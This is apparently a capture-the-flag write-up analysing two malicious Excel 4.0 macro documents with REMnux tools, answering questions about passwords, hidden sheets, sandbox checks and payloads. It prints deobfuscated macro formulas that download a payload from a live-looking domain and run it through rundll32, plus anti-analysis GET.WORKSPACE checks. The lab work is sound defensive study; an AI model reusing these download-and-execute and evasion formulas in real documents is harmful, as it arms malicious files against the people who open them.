Always open malware in a secure environment like a VM.
We will be using the REMnux distribution which is specifically made for reverse engineering.
Q1. Sample1: What is the document decryption password?
Using msoffcrypto-crack.py
we can recover the password of encrypted MS Office documents.
Copy $ msoffcrypto-crack.py sample1-fb5ed444ddc37d748639f624397cff2a.bin
Password found: VelvetSweatshop
Q2. Sample1: This document contains six hidden sheets. What are their names? Provide the value of the one starting with S.
Let's look at the file metadata using exiftool
.
Copy $ exiftool sample1-fb5ed444ddc37d748639f624397cff2a.bin
ExifTool Version Number : 12.42
File Name : sample1-fb5ed444ddc37d748639f624397cff2a.bin
Directory : .
File Size : 97 kB
File Modification Date/Time : 2020:07:24 02:50:18-04:00
File Access Date/Time : 2023:07:23 05:34:02-04:00
File Inode Change Date/Time : 2023:07:23 05:31:51-04:00
File Permissions : -rw-rw-rw-
File Type : XLS
File Type Extension : xls
MIME Type : application/vnd.ms-excel
Comp Obj User Type Len : 38
Comp Obj User Type : Microsoft Office Excel 2003 Worksheet
Author :
Last Modified By :
Software : Microsoft Excel
Create Date : 2020:04:01 11:48:22
Modify Date : 2020:04:02 12:21:34
Security : Password protected
Code Page : Windows Latin 1 (Western European)
App Version : 12.0000
Scale Crop : No
Links Up To Date : No
Shared Doc : No
Hyperlinks Changed : No
Title Of Parts : Sheet1, Sheet2, Sheet3, SOCWNEScLLxkLhtJp, OHqYbvYcqmWjJJjsF, Macro2, Macro3, Macro4, Macro5
Heading Pairs : Worksheets, 3, Excel 4.0 Macros, 6
In the Title Of Parts
field we can see that there is only one starting with a S.
Copy oledump.py sample1 -p plugin_biff.py --pluginoptions '-x' | grep "hidden"
Q3. Sample1: What URL is the malware using to download the next stage? Only include the second-level and top-level domain. For example, xyz.com.
We can use olevba
for this task.
Copy $ olevba sample1-fb5ed444ddc37d748639f624397cff2a.bin
--snip--;
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open |May open a file |
|Suspicious|RUN |May run an executable file or a system |
| | |command |
|Suspicious|ShellExecuteA |May run an executable file or a system |
| | |command |
|Suspicious|Shell32 |May run an executable file or a system |
| | |command |
|Suspicious|CALL |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|URLDownloadToFileA |May download files from the Internet |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |http://rilaer.com/If|URL |
| |AmGZIJjbwzvKNTxSPM/i| |
| |xcxmzcvqi.exe | |
|IOC |http://rilaer.com/If|URL |
| |AmGZIJjbw | |
|IOC |http://rilaer.com/If|URL |
| |AmGZIJjbwzvKNTxSPM/i| |
| |xcxmzcvqi.exRUN | |
|IOC |KUdYCRk.exe |Executable file name |
|IOC |ixcxmzcvqi.exe |Executable file name |
|Suspicious|XLM macro |XLM macro found. It may contain malicious |
| | |code |
+----------+--------------------+---------------------------------------------+
Q4. Sample1: What malware family was this document attempting to drop?
Before we do anything, we need to find the MD5 hash of the file.
Copy $ md5sum sample1-fb5ed444ddc37d748639f624397cff2a.bin
fb5ed444ddc37d748639f624397cff2a sample1-fb5ed444ddc37d748639f624397cff2a.bin
Q5. Sample2: This document has a very hidden sheet. What is the name of this sheet?
Let's use exiftool
as before in order to find the sheets contained in the file.
Copy $ exiftool sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
ExifTool Version Number : 12.42
File Name : sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Directory : .
File Size : 171 kB
File Modification Date/Time : 2020:07:24 02:56:50-04:00
File Access Date/Time : 2023:07:23 06:16:16-04:00
File Inode Change Date/Time : 2023:07:23 05:31:51-04:00
File Permissions : -rw-rw-rw-
File Type : XLS
File Type Extension : xls
MIME Type : application/vnd.ms-excel
Author :
Comments : ZNrQUl11Jl6jcYBb4wu
Last Modified By :
Software : Microsoft Excel
Create Date : 2020:02:27 10:23:09
Modify Date : 2020:03:30 12:27:59
Security : None
Code Page : Windows Latin 1 (Western European)
Company :
App Version : 16.0000
Scale Crop : No
Links Up To Date : No
Shared Doc : No
Hyperlinks Changed : No
Title Of Parts : Sheet1
Heading Pairs : Worksheets, 1
Unfortunately, exiftool
does not give us the hidden sheets.
We have to use olevba
to find the hidden sheet.
Copy $ olevba sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.1 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Type: OLE
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: CSHykdYHvi, Macrosheet
' CELL:G51, =CHAR(69.0), E
' CELL:H92, =CHAR(117.0), u
--snip--;
Q6. Sample2: This document uses reg.exe. What registry key is it checking?
In the output of the previous command, we can find the registry key.
Copy --snip--;
' CELL:CZ14, None,
' CELL:EE5, None,
' CELL:AG19, None,
' CELL:J731, None,
"VBAWarnings"=dword:00000002
--snip--;
Q7. Sample2: From the use of reg.exe, what value of the assessed key indicates a sandbox environment?
Using the xmldeobfuscator
tool, we can decode unclear XLM macros.
Copy $ xlmdeobfuscator -f sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
XLMMacroDeobfuscator(v0.2.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: /home/remnux/xlm/c38-xlm-macros/sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Unencrypted xls file
[Loading Cells]
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
auto_open: auto_open->'CSHykdYHvi'!$J$727
[Starting Deobfuscation]
CELL:J727 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5)
CELL:J728 , PartialEvaluation , =WAIT("45130.30471064814600:00:03")
CELL:J729 , FullEvaluation , FOPEN("c:\users\public\1.reg",1)
CELL:J730 , PartialEvaluation , =FPOS(FOPEN("c:\users\public\1.reg",1),215)
CELL:J732 , PartialEvaluation , =FCLOSE(FOPEN("c:\users\public\1.reg",1))
CELL:J733 , PartialEvaluation , =FILE.DELETE("c:\users\public\1.reg")
--snip--;
We can see the key specified as 1
.
Q8. Sample2: This document performs several additional anti-analysis checks. What Excel 4 macro function does it use?
In the xmldeobfuscator
output, we can see the check being performed using the GET.WORKSPACE
function.
Copy --snip--;
CELL:K2 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:K4 , FullEvaluation , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
--snip--;
Q9. Sample2: This document checks for the name of the environment in which Excel is running. What value is it using to compare?
In the output we can see the OS mentioned in the GET.WORKSPACE
command.
Copy --snip--;
CELL:J6 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7)
CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
CELL:J8 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9)
CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
CELL:J11 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12)
--snip--;
Q10. Sample2: What type of payload is downloaded?
The process is opening a rundll32.exe
file.
Copy --snip--;
CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
--snip--;
Q11. Sample2: What URL does the malware download the payload from?
Again the answer can be found in the output of the xmldeobfuscator
.
Copy --snip--;
CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
--snip--;
Q12. Sample2: What is the filename that the payload is saved as?
The answer lies in the previous snippet.
Q13. Sample2: How is the payload executed? For example, mshta.exe
We can find the answer in in the same snippet as Q10 as the payload is first opened and then executed.
Q14. Sample2: What was the malware family?
Use md5sum
to obtain the file hash.
Copy $ md5sum sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
b5d469a07709b5ca6fee934b1e5e8e38 sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Let's look up this hash in VirusTotal.
The answer is the one listed by TrendMicro.